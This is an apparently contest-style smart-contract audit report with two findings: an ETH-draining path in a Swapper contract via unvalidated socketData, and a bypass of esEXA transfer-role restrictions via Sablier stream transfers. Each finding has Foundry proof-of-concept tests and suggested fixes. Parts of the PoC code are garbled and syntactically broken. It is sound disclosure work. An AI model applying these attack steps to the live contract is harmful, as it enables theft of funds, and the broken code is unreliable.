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M1 - ETH balance from Swapper contract can be stolen


Users can erroneously send ETH to Swapper contract and due to a lack of validation of the parameter socketData in Swapper::swap it can be manipulated to exchange Swapper Contract ETH balance for EXA and send to the attacker.

Vulnerability Detail

Swapper::swap use the SocketGateway to swap any token for ETH and then use the ETH to swap it for EXA. In order to perform the swap in SocketGateway a non validated parameter named socketData is applied to socket::functionCall that should return the result (uint256) of the swap but really any method of SocketGateway can be called and therefore exist an attack path to steal the ETH Contract balance and swap for EXA and send to the attacker.

Atack path

Attacker Steal Swapper ETH balance

  1. Victim erroneously send ETH to Swapper contract because receive function doesn't have any validation, at the moment of creating the report the balance is 0.001922998074009663 ether
  2. Attacker instead of using the socketData to swap tokens, it select a method of SocketGateway the returns a uint256 less that the balance. for example SocketGateway::routesCount
  3. SocketGateway::routesCount will return an uint256 but is not the result of the swap, it is a number that the contract will use to erroneously swap the ETH balance for EXA and send to the attacker
  4. Then repeat (2) and (3) until steal all ETH of the contract

Proof of Concept

Paste this POC to Swapper.t.sol

add import:

import "forge-std/console2.sol";
  function testBlackhatCanStealContractETH() external {
    uint256 amount = 0;

    address blackhat = address(1001);
    address victim = address(1002);
    vm.label(blackhat, "blackhat");
    vm.label(victim, "victim");

    // fund the victim just it can operate
    address(victim).call{value: 1 ether}("");

    assertEq(exa.balanceOf(blackhat), 0, "Blackhat should start with 0 balance of EXA");
    assertEq(address(swapper).balance, 0, "Swapper ETH should be 0 but then will get eth");

    // Victims might inadvertently send ETH to the Swapper contract, as the receive function lacks of validations.
    // At the moment Swapper Proxy has 0.001922998074009663 ETH (6.08 USD) so i deposit that amount
    // Send eth to the contract
    uint256 initialValue = 0.001922998074009663 ether;
    // Victim send ETH to Swapper contract erroneously
    address(swapper).call{value: initialValue}("");

    assertEq(address(swapper).balance, initialValue, "Swapper ETH should be what the vvictim send");

    uint256 balanceBeforeAttack = address(swapper).balance;
    console2.log("Swapper Balance: %d, blackhat balance", balanceBeforeAttack, exa.balanceOf(blackhat));

    (bool success, bytes memory data) = address(deployment("SocketGateway")).call(
    uint256 routesCount = abi.decode(data, (uint256));

    // The attack consist that instead of calling the swap, the attacker can call any method that return a uint256 
    // less that the available ETH in the Swapper contract 
      hex"fd326921", //abi.encode of SocketGateway::routesCount

    uint256 balanceAfterAttack = address(swapper).balance;
    console2.log("Swapper after attack Balance: %d blackhat balance", balanceAfterAttack, exa.balanceOf(blackhat));

    assertEq(address(swapper).balance, initialValue - routesCount, "Swapper ETH should be what the vvictim send minus stolen");
    assertGt(exa.balanceOf(blackhat), 0, "Blackhat should receive EXA in exchange for the eth of swapper");


Loss of funds. Attacker can steal the ETH balance of the Swapper contract that is incremented when users erroneously send ETH to it because Swapper::receive is without validation. At the moment 0.001922998074009663 ether can be stolen and Swaper seems to be in production

Code Snippet

Tool used

Manual Review


Validate and restrict socketData in Swapper::swap using socketData(data[:4]) and keccak256 to verify that the method that is going to be executed is a swap of the third-party that exactly want to work and then also validate it parameters using abi.decode. ZivoeSwapper is a great examplee of how to do it.

Swapper.sol is out of the contest scope so it is an INFO but Sponsor should take inmediate action.

M1 - Any address without TRANSFERRER_ROLE can transfer esEXA tokens.


Only addresses with TRANSFERRER_ROLE can transfer esEXA tokens but ANY address can transfer esEXA to another using a combination of esEXA::vest, sablier::transferFrom and esEXA::cancel because when vesting the EscrowedEXA.sol contract creates a sablier token stream with transaferable=true property by default.

Vulnerability Detail

When a user vests esEXA tokens a sablier token stream is automatically created with the transferable=true property. If the user cancel right after initiating the vesting, the esEXA tokens are then transferred to the intended recipient. However, due to the stream's transferable nature, the recipient of the stream can be altered. Consequently, this new recipient can receive the esEXA tokens upon cancellation, thereby circumventing the controls established by the TRANSFERRER_ROLE.

Atack path

Mark can transfer esEXA to Sam doing

  1. Mark vest an amount of esEXA using esEXA::Vest
  2. Mark just after vesting transfer the token stream to Sam using sablier::transferFrom
  3. Sam now calls esEXA::cancel and get the esEXA token.

Proof of Concept

Paste this POC to EscrowedEXA.t.sol

add import:

import "forge-std/console2.sol";
  function testTransferEsEXAWithoutTransferRole() external {
    uint256 amount = 1_000 ether;
    uint256 ratio = esEXA.reserveRatio();
    uint256 reserve = amount.mulWadDown(ratio);

    address sam = address(1001);
    address mark = address(1002);

    vm.label(sam, "sam");
    vm.label(mark, "mark");, sam);
    exa.transfer(sam, reserve);

    uint256[] memory streams = new uint256[](1);

    console2.log("EsEXA balance AFTER mark: %d , sam: %d", esEXA.balanceOf(mark), esEXA.balanceOf(sam));
    assertTrue(!esEXA.hasRole(esEXA.TRANSFERRER_ROLE(), mark));
    assertTrue(!esEXA.hasRole(esEXA.TRANSFERRER_ROLE(), sam));
    assertEq(esEXA.balanceOf(sam), amount);
    assertEq(esEXA.balanceOf(mark), 0);

    exa.approve(address(esEXA), reserve);
    // mark will vest amount of esEXA
    streams[0] = esEXA.vest(uint128(amount), sam, ratio, esEXA.vestingPeriod());
    // Since the stream is set transferable when created and it is a NFT can be transfered to another person(mark).
                abi.encodeWithSignature("transferFrom(address,address,uint256)", sam, mark, streams[0])

    // mark cancel the stream and get the esEXA. 

    console2.log("EsEXA balance BEFORE mark: %d , sam: %d", esEXA.balanceOf(mark), esEXA.balanceOf(sam));

    assertTrue(!esEXA.hasRole(esEXA.TRANSFERRER_ROLE(), mark));
    assertTrue(!esEXA.hasRole(esEXA.TRANSFERRER_ROLE(), sam));
    assertEq(esEXA.balanceOf(sam), 0);
    // Mark got the esEXA from sam without having TRANSFERRER_ROLE using a combination of esEXA::vest, sablier::transferFrom and esEXA::cancel
    assertEq(esEXA.balanceOf(mark), amount);



TRANSFERRER_ROLE Access Control bypass break important assumptions that protocol contracts do as the exactly documentation says:

The esEXA tokens are only transferable for accounts with a TRANSFERER_ROLE, reserved for the protocol contracts to integrate smoothly.

Code Snippet

Tool used

Manual Review


Only addresses with TRANSFERRER_ROLE should create transaferable=true token stream and all others addresses should create non transferable stream.